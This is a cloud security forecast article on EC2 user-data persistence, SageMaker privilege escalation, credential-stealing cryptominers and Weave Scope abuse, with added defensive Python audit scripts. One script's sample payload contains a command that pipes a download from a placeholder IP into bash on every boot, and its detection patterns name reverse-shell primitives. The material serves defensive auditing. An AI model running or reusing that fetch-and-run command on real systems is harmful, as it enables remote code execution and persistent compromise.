Security is a top priority in the cloud era: the cloud gives malicious actors more targets than ever before and new tools to attack them with. These attacks start from a wide range of footholds, from ordinary credentials (forgotten or stolen) to credentials harvested through data science tools such as AWS Glue and SageMaker, to complex attacks on powerful platforms such as Kubernetes.

We will certainly see more attacks on cloud services in 2021. Here is the cloud security threat forecast for the coming year:

Persistent attacks

Cloud architectures give complete flexibility to create new instances and run virtual machines matching any required hardware or software environment. If that flexibility is not properly protected, however, it lets malicious actors launch attacks and keep them going while retaining control of the resource they first compromised.

Cloud services like Amazon Web Services make it easy for developers to build environments incrementally or intermittently. AWS, for example, lets developers run scripts (user data) automatically every time an Amazon EC2 instance restarts. This means that if an attacker manages to get a malicious shell script passed into an instance's user data, they can exploit that instance again and again, keeping their connection to the server across restarts.

In this way, attackers can move laterally from the compromised server, stealing data or gaining privileges that let them exploit more of an organization's assets. An administrator could, of course, turn this option off and require developers to log in each time they return to the environment, but that requires active cooperation from developers. AWS's flexibility is essentially its weakness: with so many configuration options, there are also more opportunities for services to be misconfigured, leaving more openings for attackers.
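To make the persistence mechanism above concrete from the defender's side, here is an added example (not code from the original article or from AWS) that audits an EC2 user-data payload offline. It assumes that cloud-init's `cloud_final_modules: - [scripts-user, always]` setting is what makes a user-data script re-run on every boot, and it uses a constructed payload with a TEST-NET address rather than data from any real instance.

```python
import base64
import re

# Constructed sample user-data payloads (not taken from any real instance).
# The cloud-config part asks cloud-init to run the user script on every boot
# by listing scripts-user with the "always" frequency (assumption: this is the
# documented cloud-init knob for per-boot execution).
SAMPLE_PERSISTENT = """Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"

#!/bin/bash
curl -s http://203.0.113.7/x.sh | bash
--//--
"""

# The same payload as the EC2 API returns it: base64-encoded.
SAMPLE_PERSISTENT_B64 = base64.b64encode(SAMPLE_PERSISTENT.encode()).decode()

# A benign first-boot script for comparison (constructed).
SAMPLE_BENIGN = """#!/bin/bash
yum update -y
systemctl enable nginx
"""

# Marker for "run the user script on every boot" rather than only on first boot.
EVERY_BOOT = re.compile(r"\[\s*scripts-user\s*,\s*always\s*\]")

# Content patterns a reviewer would want flagged in user data.
SUSPICIOUS = [
    (re.compile(r"(curl|wget)[^\n|]*\|\s*(ba)?sh"), "pipes a download straight into a shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "decodes an embedded base64 payload"),
    (re.compile(r"nc\s+-e|/dev/tcp/"), "uses a reverse-shell primitive"),
]


def decode_user_data(raw):
    """Accept user data either as the API's base64 form or as plain text."""
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: not base64, treat as text
        return raw


def audit_user_data(raw):
    """Return a list of human-readable findings for one instance's user data."""
    text = decode_user_data(raw)
    findings = []
    if EVERY_BOOT.search(text):
        findings.append("user script configured to run on every boot")
    for pattern, why in SUSPICIOUS:
        if pattern.search(text):
            findings.append(why)
    return findings


if __name__ == "__main__":
    for label, payload in [("persistent", SAMPLE_PERSISTENT_B64), ("benign", SAMPLE_BENIGN)]:
        print(label, "->", audit_user_data(payload) or ["no findings"])
```

In a real audit the payload would come from the `userData` attribute of each instance; the point of the check is that a per-boot flag combined with a remote download is exactly the combination that turns a one-off compromise into persistence, so both signals are reported separately.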

Data science tool attacks

Notebooks have proved indispensable to data scientists, helping them integrate and analyze data quickly. Tools like AWS SageMaker make the process more efficient, helping data scientists build, train, and deploy machine learning models. But as a relatively new tool, its users are mostly not security professionals, so security awareness is naturally weaker, and that too gives malicious actors an opening.

Like other Amazon products, tools like SageMaker are flexible and have many options. Research has shown that malicious actors can abuse some of these options to escalate their privileges, even up to administrator level. This attack path could let malicious actors open a terminal on a cloud instance and exfiltrate credentials while bypassing Amazon GuardDuty; those credentials can then be used to reach high-level roles and permissions. Similarly, malicious actors can draw on open source projects such as CloudGoat to escalate privileges using AWS Glue, CodeBuild and S3, as well as unused groups and roles. Administrators and data scientists therefore need to understand the architecture of the systems they use in order to protect themselves and shrink the space available to malicious actors.

Bots can infect legacy cloud assets

Bots are everywhere, even in the cloud. According to a survey by security firm GlobalDots, more than 80% of "malicious bots" (bots that steal data, scrape content, distribute spam, run distributed denial of service attacks, and so on) operate out of cloud-based data centers. While many bots attack other sites, using the servers they control against other servers and users, they can also simply commandeer cloud infrastructure to perform tasks for their owners. The most popular of these tasks, according to the study, is cryptomining, which in some ways is one of the biggest cyberthreats around.

As if stealing resources and money weren't enough, researchers report that a new variant of cryptocurrency mining malware now also steals AWS credentials. The worm carries cryptomining malware and scans for unencrypted AWS CLI credential files, from which it extracts the credentials. The fix is to limit access to this data, but that too requires active cooperation from administrators.
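Because the worm described above looks for the AWS CLI's plaintext credentials file, a defender's first check is whether such a file is readable by anyone else and whether it holds long-lived keys at all. The following is an added example, not code from the article or from AWS: it writes a constructed credentials file with placeholder values to a temporary path and audits it. It assumes the AWS convention that long-term access key IDs start with `AKIA` and temporary (STS) ones with `ASIA`.

```python
import configparser
import os
import stat
import tempfile

# Constructed sample of an ~/.aws/credentials file. Every value is a
# placeholder, not a real key.
SAMPLE_CREDENTIALS = """[default]
aws_access_key_id = AKIAEXAMPLEPLACEHOLDER
aws_secret_access_key = EXAMPLESECRETPLACEHOLDER0000000000000000

[ci-role]
aws_access_key_id = ASIAEXAMPLEPLACEHOLDER
aws_secret_access_key = EXAMPLESECRETPLACEHOLDER1111111111111111
aws_session_token = EXAMPLESESSIONTOKENPLACEHOLDER

[sso-profile]
credential_process = /usr/local/bin/fetch-creds
"""


def write_sample(mode):
    """Write the constructed file to a temp path with the given permission bits."""
    fd, path = tempfile.mkstemp(prefix="aws-credentials-")
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_CREDENTIALS)
    os.chmod(path, mode)
    return path


def audit_credentials_file(path):
    """Return findings for one AWS CLI credentials file, worst first."""
    findings = []

    # 1. Anything readable by group or others is exposed to any local process
    #    running as another user, which is what credential-stealing malware relies on.
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(f"file is readable by group/others (mode {mode:04o})")

    # 2. Long-lived keys (AKIA...) never expire on their own; temporary ones
    #    (ASIA... with a session token) limit the blast radius of a theft.
    parser = configparser.ConfigParser()
    parser.read(path)
    for profile in parser.sections():
        section = parser[profile]
        key_id = section.get("aws_access_key_id", "")
        if key_id.startswith("AKIA"):
            findings.append(f"profile '{profile}' stores a long-lived access key in plaintext")
        elif key_id.startswith("ASIA") and "aws_session_token" in section:
            findings.append(f"profile '{profile}' stores temporary credentials (expire automatically)")
        # Profiles using credential_process or SSO keep no static secret here.
    return findings


if __name__ == "__main__":
    for finding in audit_credentials_file(write_sample(0o644)):
        print(finding)
```

The two signals reinforce each other: tightening the mode to `0600` limits who can read the file, while moving profiles to temporary credentials or a `credential_process` limits what a successful read is worth.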

More Kubernetes threats to come

TeamTNT, the same cybercrime group responsible for the AWS credential theft, has taken advantage of common configuration errors to develop ways to abuse the visualization and monitoring tool Weave Scope. The attackers use the default open access on port 4040 to install Weave Scope and use it to monitor systems, consume resources, install applications, open or close a backdoor shell into containers, and do whatever they want.

Weave Scope has been successfully incorporated into cloud-based attacks, according to new research published by security firm Intezer and Microsoft.
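Weave Scope's port 4040 being reachable is the configuration error at the heart of the attack above, so the defender's check is whether a Service publishes that port outside the cluster and whether a NetworkPolicy restricts who can reach the Scope pods. The following is an added example, not code from the article, from Intezer or Microsoft, or from the Weave Scope project: it runs over constructed Service and NetworkPolicy manifests (as Python dictionaries, the shape `kubectl get -o json` returns), and the pod labels and namespaces it uses are assumptions rather than the project's real ones.

```python
# Constructed sample manifests. Labels and namespaces are assumed for the
# example; check the ones your Weave Scope deployment actually uses.
SAMPLE_SERVICES = [
    {"kind": "Service",
     "metadata": {"name": "weave-scope-app", "namespace": "weave"},
     "spec": {"type": "LoadBalancer",
              "selector": {"app": "weave-scope", "name": "weave-scope-app"},
              "ports": [{"port": 80, "targetPort": 4040}]}},
    {"kind": "Service",
     "metadata": {"name": "scope-app", "namespace": "monitoring"},
     "spec": {"type": "ClusterIP",
              "selector": {"app": "weave-scope"},
              "ports": [{"port": 4040, "targetPort": 4040}]}},
    {"kind": "Service",
     "metadata": {"name": "web", "namespace": "default"},
     "spec": {"type": "ClusterIP",
              "selector": {"app": "web"},
              "ports": [{"port": 8080}]}},
]

# One policy that only lets pods from an "sre" namespace reach the Scope UI.
SAMPLE_POLICIES = [
    {"kind": "NetworkPolicy",
     "metadata": {"name": "scope-admin-only", "namespace": "monitoring"},
     "spec": {"podSelector": {"matchLabels": {"app": "weave-scope"}},
              "policyTypes": ["Ingress"],
              "ingress": [{"from": [{"namespaceSelector": {"matchLabels": {"team": "sre"}}}],
                           "ports": [{"port": 4040}]}]}},
]


def _port_targets(port_entry, scope_port):
    """A Service port reaches Scope if its targetPort (or port, when omitted) is 4040."""
    return port_entry.get("targetPort", port_entry.get("port")) == scope_port


def _policy_restricts_ingress(policy, namespace, pod_labels):
    """True if this policy selects the given pods and governs their ingress."""
    if policy["metadata"]["namespace"] != namespace:
        return False
    # Kubernetes treats a missing policyTypes as including Ingress.
    if "Ingress" not in policy["spec"].get("policyTypes", ["Ingress"]):
        return False
    wanted = policy["spec"].get("podSelector", {}).get("matchLabels", {})
    # An empty podSelector selects every pod in the namespace.
    return all(pod_labels.get(k) == v for k, v in wanted.items())


def audit_scope_exposure(services, policies, scope_port=4040):
    """Return findings for every Service that fronts the Scope port."""
    findings = []
    for svc in services:
        spec, meta = svc["spec"], svc["metadata"]
        if not any(_port_targets(p, scope_port) for p in spec.get("ports", [])):
            continue
        name = f"{meta['namespace']}/{meta['name']}"
        svc_type = spec.get("type", "ClusterIP")
        if svc_type in ("NodePort", "LoadBalancer"):
            findings.append(f"{name}: {svc_type} Service publishes port {scope_port} outside the cluster")
        if not any(_policy_restricts_ingress(pol, meta["namespace"], spec.get("selector", {}))
                   for pol in policies):
            findings.append(f"{name}: no NetworkPolicy limits ingress to the Scope pods")
    return findings


if __name__ == "__main__":
    for finding in audit_scope_exposure(SAMPLE_SERVICES, SAMPLE_POLICIES):
        print(finding)
```

Only the `weave/weave-scope-app` Service is reported on the sample data: it is published through a LoadBalancer and no policy covers its pods, which is the "default open access" the article describes. The `monitoring/scope-app` Service stays quiet because it is cluster-internal and a policy narrows its ingress, and the unrelated `web` Service is skipped because it never reaches port 4040.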

Currently, attackers mostly use these methods to install cryptocurrency mining malware, but nothing stops them from taking control of cloud systems for other malicious purposes. The attack surface is constantly changing and growing. As Google's Kubernetes project continues to evolve and add new features, more and more businesses and developers have moved their work to K8s. This has also attracted malicious actors, who probe the Kubernetes project's new features for opportunities to exploit: bugs and misconfigurations that users were unlikely to fix because they didn't know how to, or didn't really know Kubernetes at all.

Preempt rather than react

As organizations deploy more cloud applications, attacks on the cloud will naturally grow. Companies' public cloud spending is expected to more than double their 2019 allocations by 2023, and we are sure we will see more of these and other kinds of attacks as attackers keep looking for the "weakest link" they can exploit.

Unfortunately, most of these problems, as well as new ones still emerging, are in fact fixable, but many administrators and users generally don't see them until they happen. By then they have become "victims", and their stories are published on security companies' blogs before they can work out how to fix what happened.

To avoid this, the trick is to find the "holes" or misconfigurations that give attackers an entry point, and fix them before they become a real attack. As cloud usage keeps growing in 2021, users' security awareness of configuration issues, and of how to solve them, will have to grow in tandem.
